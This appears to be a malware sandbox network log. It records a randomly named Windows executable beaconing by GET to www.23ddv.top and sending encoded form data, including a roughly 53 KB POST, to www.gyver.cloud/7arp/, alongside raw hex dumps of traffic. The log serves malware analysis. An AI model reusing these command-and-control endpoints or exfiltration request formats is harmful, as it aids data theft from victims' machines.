                                                                                  Data Raw: 08 70 4b 68 26 3e 8a de 8b e9 e6 78 e8 3b 7a 6c 85 fb 49 37 8d c6 a2 d2 dd 40 1e bc 66 b8 c8 1a 69 e7 06 24 b0 68 0e b4 79 40 a5 73 eb 3d 51 9c ce 0b 8f 68 fa f4 fc 25 8e e6 78 e6 03 e7 f0 82 7a 42 d3 42 e0 bb e9 64 e2 62 92 a2 ab 6b 0e c1 ce 72 5d 02 b5 a7 0b 09 be 37 e7 34 de 54 26 13 73 f3 9e 42 68 44 4e f3 6c ce 04 a1 59 f5 7d 83 a5 01 d9 34 8d 08 70 87 95 20 b4 ed 30 0f 6d dd e2 79 3c 92 6a 22 9a 16 e9 19 8f 42 3b 81 13 9a 09 89 d5 5c 94 c4 bb 34 a0 27 6a 70 1b 54 08 69 6c fb 68 07 77 ea dc 4b f8 a6 4f 53 71 5a 7b c0 79 34 34 6e 7e 9b cd 8c 71 81 4a b7 95 ff 44 93 52 f5 0e bb fd bf f3 d0 a6 0f 89 aa b2 78 8c 44 7a 9c 8c c4 84 4e 37 98 58 56 24 7e b1 d4 89 0c 91 9b c1 ed 0c d1 a6 39 58 7f 09 4b da 85 f7 51 92 6f 0c 80 ac 98 eb fa a0 10 4e 1b b3 38 ba 95 32 10 0a 6e ff 42 ea 2b 50 c4 47 45 c6 32 9d 16 0d 65 87 32 35 af 96 90 db 1c c3 9b a4 61 5b b1 b3 ee e4 30 4a 5a ce d7 a7 c7 55 36 f3 ef 8b ca c1 ca 12 3e f4 c4 ff 1d 2c ff eb 37 42 bb 8f 55 3d b2 57 54 5c 62 84 fd 11 1a c6 b5 b3 fb 33 61 02 95 [TRUNCATED]
                                                                                  Data Ascii: pKh&>x;zlI7@fi$hy@s=Qh%xzBBdbkr]74T&sBhDNlY}4p 0my<j"B;\4'jpTilhwKOSqZ{y44n~qJDRxDzN7XV$~9XKQoN82nB+PGE2e25a[0JZU6>,7BU=WT\b3a~KO^\hmEKvcw:CSN*j@[xf[SMY@|"(m-qs,cj*082RK,GvlMuSK&t9_^3%Crto=v`jD~'N$'=fh7}bCXdyz>?t4pQ7`R<?G;*WyGdW.}XaM,u5IQ0QnS+3i6P9Z,}M*4@Pst$MpfWAvqXH;{R)k%@43o$L)]O4{`NI(0Y0k+zyhq6%h"2Zh'yP_g +n@7)CS&qm@.#O'-^OAvDpq8c?+W0k*_iyrX-P7K,:j3sM;Dst@,Sk_<57 xulgP/RsSp4]Q?K53kxm7)4%>HW [TRUNCATED]
                                                                                  Aug 27, 2024 17:45:52.320571899 CEST1289INData Raw: bd 75 53 02 95 49 20 15 ea f0 80 93 58 8e 42 75 7d 1d 37 18 96 10 08 bb e9 64 e2 3a 11 4a a2 e0 c6 42 0e 4e d6 02 b6 66 88 c9 96 34 ef cb 3f c4 26 13 73 f3 9e 42 68 44 4e f3 6c ce 04 a1 59 f5 7d 83 a5 01 d9 34 8d 08 70 87 95 20 b4 ed 88 0f 6d dd
                                                                                  Data Ascii: uSI XBu}7d:JBNf4?&sBhDNlY}4p mfjG`,FJJz:fbW%!s5([PPUJD+#oY`:$7.PkB=j0j#oUN9B+PGE&2d25a[
                                                                                  Aug 27, 2024 17:45:52.320702076 CEST1289INData Raw: a7 b7 51 36 f3 ef cb ca c1 da 12 3e f4 c6 ff 1d 2a ff eb 37 42 bb 8f 55 3b b2 57 54 5c 62 84 fd 11 6a c2 b5 b3 f9 33 61 02 95 7e 0e c0 4b ba ce 5e 5c 8f 68 f5 7d 9a b2 02 e0 12 13 45 9d 4b f3 76 dc 8e 86 d3 05 f2 e1 fe 15 d2 ca b2 82 a8 05 63 8a
                                                                                  Data Ascii: Q6>*7BU;WT\bj3a~K^\h}EKvcw:CSN*j@[xf[SMY@|"(m-qs,cj*082RK,GvlMuSK&t9_^3%mIv`nD~qJ$'=fh7}BC8dyz
                                                                                  Aug 27, 2024 17:45:52.320717096 CEST1289INData Raw: e6 8b c5 8b f1 f3 34 f3 0e 70 51 37 d8 60 52 3c 1c c1 ad f1 a6 ff d1 f4 95 3f 47 b2 d6 c8 db 3b 2a e5 57 79 47 b9 8e b5 64 57 94 bb 2e 7d 08 b0 1c 0e f2 b5 58 11 61 4d af 86 a5 ea 2c 75 35 49 51 a0 30 92 8d 94 51 a5 01 e2 6e 01 a2 fc 53 2b 33 0f
                                                                                  Data Ascii: 4pQ7`R<?G;*WyGdW.}XaM,u5IQ0QnS+3i6P9Z,}M*4@Pst$MpfWAvqXH;{R)k%@43o$L)]O4{`NI(0Y0k+zyhq6%h"2Zh'yP
                                                                                  Aug 27, 2024 17:45:52.320806980 CEST1289INData Raw: 7c 5a a0 ac 33 a8 28 2a 54 ca df 02 7a 79 dc 88 65 49 48 e3 a3 16 5a 59 6b 6a 41 e1 16 ef 05 4c 24 ac e6 d3 4b d0 f4 89 03 8c 07 2f fc 6b eb f8 e7 0c ac 6d ed 1c 63 ba 87 b8 73 79 f9 0c c3 5c b8 ca 83 ee 19 26 b3 b1 1f 87 e7 b8 15 77 15 03 a4 86
                                                                                  Data Ascii: |Z3(*TzyeIHZYkjAL$K/kmcsy\&w-D*|/;3,IU~RD|h#c)9@K/0i@gO$d^B\)p40*]"bckj?wLt{niv'}@s>D{{Ol#e&}
                                                                                  Aug 27, 2024 17:45:52.320930958 CEST1289INData Raw: 87 65 d0 3a 23 15 19 7b 6f 3d a2 32 e1 85 23 e5 75 89 b2 fd ce ec ca ca dc c8 95 fe d5 1d 8d 45 f5 8d d5 d2 09 b3 49 6b 75 53 02 2e 9d 20 15 ea 7b 8c 94 d9 7f d2 d7 43 1c be 95 92 ee f7 44 6c bf 96 29 a9 37 c1 3a c2 b5 e5 8f 2c 00 3d bc 49 22 89
                                                                                  Data Ascii: e:#{o=2#uEIkuS. {CDl)7:,=I"75OshBhV({t*~Umulbi!3_gtFmLPUap.U+D_#ZeHXA*1nuKtRg?
                                                                                  Aug 27, 2024 17:45:52.320943117 CEST1289INData Raw: 1b 54 0f ff 42 ea 93 3d 1e 08 d3 d1 db 9c c6 c7 9e 8b b9 ff 38 7b 8f d8 d6 b6 70 1c e8 d3 39 1b 0c 0a 33 9c 8b 34 d0 2c 45 90 d8 ec ec 39 bf 2a e3 6f 36 fb 42 ba 1b 2a ff 60 62 4e 3e 5d 5a bf 88 51 54 5c e9 f1 ed 9a 2c b6 86 f5 fd 08 b1 0d 19 57
                                                                                  Data Ascii: TB=8{p934,E9*o6B*`bN>]ZQT\,WK*vf=[HkH)1fl[LF9)Sq660O,2UBm$.smrU7kH-QXX,\\fv-)AF(R0w9GZYdn2!f6
                                                                                  Aug 27, 2024 17:45:52.321042061 CEST1289INData Raw: 61 40 0d a6 44 7e fb 1a 26 15 02 62 69 8d 99 e3 06 59 35 a2 7d 56 b7 8f 8d 88 6e 0f 26 9b f2 fd 71 3c bb 3f fe 0a ff 27 03 81 95 0e c8 43 8b 7c cc da 72 20 20 db 79 e4 fa ea bd a9 7d 3d 0a 6a c0 ca 2d a2 c9 db 3b 19 13 da 1d 63 b9 c8 0d cf fd 3e
                                                                                  Data Ascii: a@D~&biY5}Vn&q<?'C|r y}=j-;c>rmO.,@Jf2sb>S+i6/ZB#+74A[R@$MSQBp)@Qy1j!;Lj>PH%S#99^AXA'br/-}
                                                                                  Aug 27, 2024 17:45:52.321053028 CEST1289INData Raw: b0 35 21 aa 4f 33 f4 92 db a8 25 63 b3 48 32 29 bc 18 71 a3 e0 5a 68 22 2f 2f 26 b9 a1 55 90 c3 47 3a e3 8b 43 a0 d8 56 d1 da 15 59 a4 7c a4 c2 c9 2d 91 8f c6 64 bf a5 1d 6d 3e 73 ee fb e5 03 aa ca 23 d7 c0 5f b7 e6 27 2d 5e 88 55 2b 41 76 8d 44
                                                                                  Data Ascii: 5!O3%cH2)qZh"//&UG:CVY|-dm>s#_'-^U+AvD'B"\4<c,0kC)}$SwE&%sKU!#2:jFDM;-DsU@,SIul!~ \8pL`fxsOZ>?x|BKm7 ]|.$
                                                                                  Aug 27, 2024 17:45:52.321064949 CEST1289INData Raw: fb 15 0f 0a ae b9 7a 22 28 4b 66 90 94 0c a8 02 4e 85 33 98 a6 02 9d 36 34 b0 fa 90 33 18 cd ae 39 71 b3 cf cd f7 ce 7f ee 95 fd 62 ff 0b 72 3d 87 7b 57 3f ff 69 56 0f e6 d9 8f 64 98 af ce 6c 02 68 01 5c c3 f3 ef 39 8d d5 ff fd 00 0a fe 25 53 02
                                                                                  Data Ascii: z"(KfN36439qbr={W?iVdlh\9%SRq%~ .0G#x!-]?+|pA/!fwG9'~T e#cIN!WUr|Z$N(MJzTNppba
                                                                                  Aug 27, 2024 17:45:52.457650900 CEST1289INData Raw: 70 0d f8 4a 44 7f fe c2 6f d8 75 4d c1 41 47 ea e1 72 ff 6e d1 b6 19 26 10 bb 7d ed 17 71 15 08 8d d7 16 32 40 6a f9 89 b6 30 e0 9b 26 d4 a5 95 f3 d2 73 b9 73 46 50 ef f9 3a b0 0f e7 97 e8 dc 9d 10 41 3c 98 31 ed a3 e4 45 78 c9 b0 83 a7 71 17 6e
                                                                                  Data Ascii: pJDouMAGrn&}q2@j0&ssFP:A<1Exqn"Y%iIDp}(e3a2KEH~2x#YCH0K>d[LX*TsgW!8h6 t(,-vHRh=b8X@D~QYjD


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.11.2049807154.23.184.218805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:46:30.460151911 CEST522OUTGET /y2fc/?AvLLLbOh=5ZJwW+6cR+ukQX5L66hOVx0TNjHyeT2hZgA90YyTgMK9x7yRXodN7xJ1LlWJY5c/jX+OBDC/YU0F38ZFJDu2iru/QAMqsMv9PfcDIAk5SRBflopttme4W2g=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.23ddv.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:46:30.761910915 CEST312INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:46:30 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 148
                                                                                  Connection: close
                                                                                  ETag: "66a4f874-94"
                                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.11.204980876.223.67.189805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:46:51.116849899 CEST785OUTPOST /7arp/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.gyver.cloud
                                                                                  Origin: http://www.gyver.cloud
                                                                                  Referer: http://www.gyver.cloud/7arp/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 4c 66 2f 58 6e 77 39 56 75 5a 56 6b 54 77 42 4b 37 35 6a 52 67 5a 7a 61 35 41 30 59 32 66 51 66 6f 77 4b 70 35 33 39 45 44 4d 6a 5a 78 49 37 31 48 66 72 51 31 57 79 4a 2b 59 52 45 55 47 61 31 78 7a 4b 6b 72 50 4e 59 45 4d 41 6d 54 34 61 4d 65 6d 63 4e 69 7a 62 59 2b 37 6e 45 37 4e 71 49 65 66 35 32 50 36 52 43 2b 5a 58 4e 6b 41 46 6a 70 71 47 57 50 38 78 76 4b 71 59 39 63 63 4c 4c 79 46 73 47 45 5a 37 47 50 46 65 37 51 78 42 56 79 57 33 6e 75 5a 51 7a 35 31 66 72 6b 6b 54 42 41 34 6e 6f 43 4b 35 62 34 72 69 45 4b 30 5a 79 7a 59 30 32 76 77 3d 3d
                                                                                  Data Ascii: AvLLLbOh=Qdac4tatAq89Lf/Xnw9VuZVkTwBK75jRgZza5A0Y2fQfowKp539EDMjZxI71HfrQ1WyJ+YREUGa1xzKkrPNYEMAmT4aMemcNizbY+7nE7NqIef52P6RC+ZXNkAFjpqGWP8xvKqY9ccLLyFsGEZ7GPFe7QxBVyW3nuZQz51frkkTBA4noCK5b4riEK0ZyzY02vw==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.11.204980976.223.67.189805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:46:53.751492023 CEST1125OUTPOST /7arp/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.gyver.cloud
                                                                                  Origin: http://www.gyver.cloud
                                                                                  Referer: http://www.gyver.cloud/7arp/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 49 2f 76 58 6b 58 70 56 37 4a 56 6a 57 77 42 4b 77 5a 6a 56 67 5a 2f 61 35 42 78 46 32 4d 34 66 6f 53 53 70 36 31 5a 45 47 4d 6a 5a 37 6f 37 77 59 76 72 68 31 57 2f 30 2b 5a 42 45 55 47 6d 31 72 68 43 6b 38 76 4e 5a 64 38 41 35 51 34 61 4e 61 6d 63 51 69 7a 65 35 2b 35 62 45 36 39 4f 49 66 63 42 32 65 34 35 42 31 5a 58 50 78 51 46 67 2f 61 47 59 50 38 4e 6e 4b 76 55 4c 62 75 58 4c 79 6b 41 47 57 4a 37 5a 59 46 65 67 66 52 41 34 6b 54 72 71 6d 35 77 35 31 47 50 72 6a 58 58 69 4d 36 4c 4f 44 73 4e 6c 70 5a 79 54 43 51 63 53 6d 63 78 61 72 67 72 71 78 4f 66 4f 64 47 4e 66 72 65 43 5a 6a 66 37 41 72 42 74 2f 76 4f 68 6f 34 73 5a 57 6f 36 66 57 50 52 67 4d 54 39 76 50 30 37 39 39 4a 6e 45 59 30 53 7a 79 41 5a 65 41 67 46 4e 46 68 55 33 75 56 5a 6d 68 33 73 57 41 35 61 49 51 4f 46 7a 65 79 4d 46 48 76 54 5a 73 45 72 45 50 70 72 68 34 51 7a 37 65 68 63 32 74 53 54 70 46 54 4f 65 36 42 6a 2b 6a 69 64 79 4e 75 57 79 54 47 4d 44 69 44 39 66 4b 4e [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=Qdac4tatAq89I/vXkXpV7JVjWwBKwZjVgZ/a5BxF2M4foSSp61ZEGMjZ7o7wYvrh1W/0+ZBEUGm1rhCk8vNZd8A5Q4aNamcQize5+5bE69OIfcB2e45B1ZXPxQFg/aGYP8NnKvULbuXLykAGWJ7ZYFegfRA4kTrqm5w51GPrjXXiM6LODsNlpZyTCQcSmcxargrqxOfOdGNfreCZjf7ArBt/vOho4sZWo6fWPRgMT9vP0799JnEY0SzyAZeAgFNFhU3uVZmh3sWA5aIQOFzeyMFHvTZsErEPprh4Qz7ehc2tSTpFTOe6Bj+jidyNuWyTGMDiD9fKN8YvqjtWW6vnv2Xp9OT3E46XHXNaVhbQeipRJtAzOeb5PCGK4+inyFq7/0L3lASkw3njdv7tbWTwWWdGJTXs5NzeasL6uscKjQEkffeiBx8kIDSB1J+Al3URlLka2s7mGoyYoarn5Mxey+ej8bewmfVEtz22LumxGptF0Mm2dr1MR6UtrIRpB/sFaZQEz7k/OirfP9MN0eiG43Q=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.11.204981076.223.67.189805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:46:56.391618013 CEST3867OUTPOST /7arp/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.gyver.cloud
                                                                                  Origin: http://www.gyver.cloud
                                                                                  Referer: http://www.gyver.cloud/7arp/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 49 2f 76 58 6b 58 70 56 37 4a 56 6a 57 77 42 4b 77 5a 6a 56 67 5a 2f 61 35 42 78 46 32 4b 67 66 70 6e 4f 70 36 55 5a 45 42 4d 6a 5a 33 49 37 78 59 76 72 47 31 57 32 2f 2b 5a 4e 2b 55 41 71 31 79 57 6d 6b 38 39 56 5a 4c 73 41 34 56 34 61 50 65 6d 64 4d 69 7a 62 2b 2b 34 2b 7a 37 4e 53 49 65 62 39 32 49 5a 35 43 32 4a 58 4e 78 51 46 73 30 36 47 6d 50 38 35 4a 4b 76 51 4c 62 73 54 4c 78 77 6f 47 46 6f 37 5a 66 56 65 6e 57 78 41 37 32 54 71 51 6d 35 31 41 31 47 50 56 6a 57 54 69 4d 36 72 4f 43 72 78 69 71 35 79 54 4c 77 63 52 33 73 31 65 72 67 47 70 78 4f 37 4f 64 42 4a 66 71 2b 43 5a 70 61 58 44 6a 42 74 39 69 75 67 79 75 73 64 65 6f 36 4b 6e 50 55 34 4d 53 4e 72 50 75 6f 56 39 46 6b 63 59 36 53 7a 77 50 35 65 58 72 6c 4d 65 68 55 47 48 56 59 48 55 33 76 36 41 6a 2b 55 51 46 45 7a 5a 78 73 46 42 32 6a 59 30 57 62 41 54 70 72 77 6e 51 7a 36 46 68 64 79 74 53 48 56 46 42 4d 32 39 4d 54 2f 72 71 39 79 45 37 6d 2b 4a 47 4d 50 71 44 2b 66 61 4e [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=Qdac4tatAq89I/vXkXpV7JVjWwBKwZjVgZ/a5BxF2KgfpnOp6UZEBMjZ3I7xYvrG1W2/+ZN+UAq1yWmk89VZLsA4V4aPemdMizb++4+z7NSIeb92IZ5C2JXNxQFs06GmP85JKvQLbsTLxwoGFo7ZfVenWxA72TqQm51A1GPVjWTiM6rOCrxiq5yTLwcR3s1ergGpxO7OdBJfq+CZpaXDjBt9iugyusdeo6KnPU4MSNrPuoV9FkcY6SzwP5eXrlMehUGHVYHU3v6Aj+UQFEzZxsFB2jY0WbATprwnQz6FhdytSHVFBM29MT/rq9yE7m+JGMPqD+faN7gvqDtWUdzkhGXugeSuJY6mHXB3Vkj6dSFRIdQzEuavECGOzei62Fq7/0HJlAWk3GvjfdjtLRnwUWdAJTX95N/lasDlusMwjW8kfuuiC0QnNzSA/p+X6nROlLIs2sqEFaGY6q7nqcxd3eee27ecieodtz6MLuChGrtFkqL5MoRxNZAw2t4QW/kOQ5U48p4zJFPHRN0nmdm7rghsCuB+cIgsvzxbKRE01Wb1FYcQsfql7A/tgh/76/CycUUjbtPALjoIiA+cHUJrShC6Cx9GNREzSytVXwuBgCYNAA4ycTwEITp0E7BxZC1ACsax2/3drYI9/A0yluIIPGjMLmSSTe8iDCkYdtTyTAhMVTNV/ykAA3DTvchT0H6yuOaOD6qyFIs1Gg7PRm9gFCY5X/J6DNWr0B8PcS6taD95ootFDpHX7AuBvFLg7eUdeVhBLPbBizXCxrG7nLFnCkLcOhffbz2SQHjtO7vAWPeDHdCWvlkkBIvnKCO8RgXTUWMX+S60QdfSIkzKe0xX+zdlql0ZS2tmhEnVDdK3IdD5bmsewjlVV5mrIzxva7jDy5QG7TQa8mrTN6hC+fUqM+YSNL1u8LaacF9gxC1j0kdug+1bIy9Gg4yuMWek2QDeItqE7778Lt2CbDS+fHNijsmmZYfvtkqhL1Wuwzf7yQI [TRUNCATED]
                                                                                  Aug 27, 2024 17:46:56.391752005 CEST9023OUTData Raw: 36 38 6b 36 72 36 70 75 6c 71 37 63 37 6b 49 66 2b 41 54 68 74 47 79 4b 52 37 68 71 49 36 46 57 76 2b 57 65 2b 54 72 32 59 63 73 6e 32 76 37 37 70 51 63 4c 4a 4c 6f 79 6b 6d 55 6c 6c 61 68 6f 37 4c 34 45 66 46 59 50 6c 2f 6e 76 33 65 65 57 49 4b
                                                                                  Data Ascii: 68k6r6pulq7c7kIf+AThtGyKR7hqI6FWv+We+Tr2Ycsn2v77pQcLJLoykmUllaho7L4EfFYPl/nv3eeWIKQibZUV00zgSZNXAuda/EFAG8pzyQ1wDzdrDyKwSSRg0Y4L3Psu7c6kAPITeBXlkmLKbu9WVg86sJY/wdbM7D8MRE6j9eqdo1CcsvURnsGUw4IIEonSFtfaC2P80vDaDbgcL3CZmvT4HwOAzNH6LxpJxxcbyYRxUmH
                                                                                  Aug 27, 2024 17:46:56.492734909 CEST2578OUTData Raw: 51 46 71 73 39 6f 4d 53 55 37 30 57 62 51 2b 56 68 77 6a 63 57 39 73 6b 6c 45 70 69 44 4a 41 68 2b 79 2f 69 72 2f 74 47 45 57 39 67 46 4a 45 6e 2f 42 71 39 2b 65 42 46 72 78 76 6c 6b 62 57 48 30 35 53 36 2b 67 33 6f 2b 35 52 61 44 31 52 66 47 6f
                                                                                  Data Ascii: QFqs9oMSU70WbQ+VhwjcW9sklEpiDJAh+y/ir/tGEW9gFJEn/Bq9+eBFrxvlkbWH05S6+g3o+5RaD1RfGoQJWCqb7VI4BRPVwC7niHmklw2oxL1em3xBI4YDy3uTL2udaGQkI3cX9A4kISt3N5q3WnmdQkoBM7iX89Hdm6PlI+UeM2oNJ59qfleuCmLZRFfb6l/bYMWsgbxpEPZggvcn7vic8BZ9wato8AYjgaz42CZaGbNkkxp
                                                                                  Aug 27, 2024 17:46:56.492774010 CEST1289OUTData Raw: 42 67 4a 31 6f 48 47 74 30 41 5a 6e 7a 78 5a 56 70 58 77 67 4a 57 4e 44 59 71 62 6d 55 4a 51 54 36 38 41 58 6d 71 37 53 52 33 77 75 71 39 79 65 74 72 67 38 34 34 78 39 6f 62 4c 56 4e 4c 69 63 6a 49 4e 34 2f 45 64 51 74 6a 44 61 47 46 49 2b 50 6e
                                                                                  Data Ascii: BgJ1oHGt0AZnzxZVpXwgJWNDYqbmUJQT68AXmq7SR3wuq9yetrg844x9obLVNLicjIN4/EdQtjDaGFI+Pn5a22AtHVx8zrsfRcBRuDNTGq6xN4nyq2CvimJVeqjBUFHxtC1mu+FefByqva48g4Kg4Zf/gH/6msiguHaor5SSposi/Sn7e7zOYf+O0kXDoyAoHYhHSPboKNO4yL2AbnuxgRgPIr1i2FKMQXNKOBLmUAbrRw6obot
                                                                                  Aug 27, 2024 17:46:56.492819071 CEST1289OUTData Raw: 39 39 71 6c 43 76 4d 4b 73 34 50 78 45 48 45 34 5a 7a 4a 55 4d 5a 76 6c 6c 2f 6f 36 50 65 54 50 39 38 34 64 74 59 6c 74 30 4a 69 39 75 58 64 4b 70 46 6a 46 4d 51 42 2f 63 76 75 7a 34 74 77 4d 4c 42 70 37 4b 4c 45 7a 7a 43 73 59 67 56 2b 61 56 53
                                                                                  Data Ascii: 99qlCvMKs4PxEHE4ZzJUMZvll/o6PeTP984dtYlt0Ji9uXdKpFjFMQB/cvuz4twMLBp7KLEzzCsYgV+aVSCJcYVWNEy7yiV1RUwDotX6PSOooQxrOBTIhmF4PH0GuaG9hsi1WUvPM/kglqIEW0IWTup4BCuVdM5FCPVBerJN4Ya57A6nAiwffChQCm0ZFjRIUbPMBciYzJ2MmiXGEqt/Fcx+e1lSOHAeCDR6PWM3guX5eA3poXk
                                                                                  Aug 27, 2024 17:46:56.492991924 CEST9023OUTData Raw: 62 6c 42 6b 42 49 73 62 70 6a 4f 2f 65 69 33 36 7a 67 6c 38 74 65 43 30 71 43 36 36 51 49 72 31 42 58 31 36 31 50 4f 46 67 57 63 38 4a 77 39 77 58 52 31 35 77 5a 65 45 2b 4a 4e 35 55 79 62 50 50 50 58 55 30 56 64 78 67 52 54 75 73 39 64 6f 6e 76
                                                                                  Data Ascii: blBkBIsbpjO/ei36zgl8teC0qC66QIr1BX161POFgWc8Jw9wXR15wZeE+JN5UybPPPXU0VdxgRTus9donv/KO5oJal+ecvcQZptSLTpQvKo2WuWWXYzbpPZl4ItI5mswgNia60Z/0jcn3W5a3cU8XEEK4GcONdAmokkdHsAAvjc6BHiCUT+LLd4aRvndUiWS87DD78yq6MZPSuOQtCtZdRMX09gXHoVFccWZ+5POJP6HQLgHX6x
                                                                                  Aug 27, 2024 17:46:56.493161917 CEST3867OUTData Raw: 6a 6d 46 7a 59 42 50 6c 55 61 78 53 79 45 63 68 4a 43 37 42 51 4c 43 52 51 65 56 73 74 7a 7a 35 33 76 6c 2b 7a 72 56 74 36 75 6b 36 5a 41 56 53 47 39 35 68 57 4c 31 70 4a 53 61 50 51 66 63 7a 32 69 2b 4e 5a 51 6a 57 31 36 76 6c 59 79 62 4d 50 63
                                                                                  Data Ascii: jmFzYBPlUaxSyEchJC7BQLCRQeVstzz53vl+zrVt6uk6ZAVSG95hWL1pJSaPQfcz2i+NZQjW16vlYybMPcAL+6BNIfQqv5K6UAZcjAlKF7IB/GD0sXr3ksvvK5TvWM1BuV8SC9bvHU/t6+sH9ZiBLblbqRO0FCkicMEUR5oSN8lVPh+iI2j3MwqkNjJomIF9fEocb0i0Uv6CgXTvfSt/pHBZpp9icvNO+aRcexQNO3ZWJUgaC42
                                                                                  Aug 27, 2024 17:46:56.493329048 CEST1289OUTData Raw: 33 73 41 58 32 58 52 70 45 4c 46 48 6f 44 7a 6c 47 2b 77 56 63 4b 57 49 7a 6f 75 30 64 62 6b 73 70 70 6e 66 31 32 44 56 32 70 44 4c 79 47 61 33 48 38 41 6a 74 2f 6d 61 44 6b 58 56 6b 37 6c 77 5a 6f 7a 55 32 58 6a 59 54 42 57 48 47 65 39 78 6f 78
                                                                                  Data Ascii: 3sAX2XRpELFHoDzlG+wVcKWIzou0dbksppnf12DV2pDLyGa3H8Ajt/maDkXVk7lwZozU2XjYTBWHGe9xoxO6uJQhBRFZavlSUq/lxguU2Zj2gkoK+xRQ0sJBgXb5TXLXrk7akF3CJiE5i/DnWtQLQMbIlkzaZhiCMHrwRN+Kr9qCaN5VF2wB6afOoZLVuMmiBbbRN5e4qWnRQH8nH025+UzV5I65QhTp1jJBPSWZ7i41aC6DLPZ
                                                                                  Aug 27, 2024 17:46:56.493531942 CEST6445OUTData Raw: 5a 39 36 66 35 6c 57 72 71 54 65 71 64 43 57 43 56 58 78 72 34 4b 39 34 34 52 42 4e 66 37 31 4e 79 58 59 48 46 32 72 52 57 4e 46 63 57 74 6c 43 61 32 2b 7a 37 59 62 44 58 43 55 74 50 35 64 77 52 67 51 6c 31 4d 42 4c 75 76 53 74 6b 58 50 73 43 75
